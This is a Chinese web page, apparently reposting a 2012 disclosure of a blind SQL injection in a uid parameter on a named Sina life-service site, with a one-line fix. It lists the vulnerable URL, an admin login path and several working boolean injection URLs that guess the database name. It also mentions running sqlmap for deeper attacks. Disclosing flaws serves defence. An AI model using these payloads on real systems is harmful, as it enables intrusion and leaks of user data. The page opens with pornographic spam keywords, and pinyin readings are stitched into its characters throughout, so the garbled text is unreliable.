欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

新浪生活服務(wù)互動(dòng)社區(qū)Mysql盲注漏洞的介紹及其修復(fù)方法(圖解)

  發(fā)布時(shí)間:2012-06-01 09:41:25   作者:佚名   我要評(píng)論
Mysql盲注漏洞,做網(wǎng)站的要關(guān)注哦
注入漏洞存在地址為
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中該漏洞可以導(dǎo)致數(shù)據(jù)泄漏,其中泄漏的數(shù)據(jù)包括團(tuán)購,優(yōu)惠券、以及用戶聯(lián)系方式,smslog,團(tuán)購商戶、admin等數(shù)據(jù)。
 
同時(shí),團(tuán)購的商戶登陸地址為
http://life.sina.com.cn/tuanadmin
 
漏洞證明:下面為手工猜解數(shù)據(jù)庫名的語句為
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下圖為注入是返回對(duì)正確與錯(cuò)誤的截圖
 
 
 
注入返回對(duì)的情況截圖
 
 
 
注入時(shí)返回錯(cuò)的情況截圖
 
一下是使用sqlmap對(duì)注入點(diǎn)進(jìn)行注入攻擊,一下該例為查詢數(shù)據(jù)庫banner,通過改變命令參數(shù)可以對(duì)其進(jìn)行更深入的攻擊。
 

 
修復(fù)方案:

對(duì)其uid參數(shù)進(jìn)行檢查并且進(jìn)行過濾。
 
作者 Insight-labs

相關(guān)文章

最新評(píng)論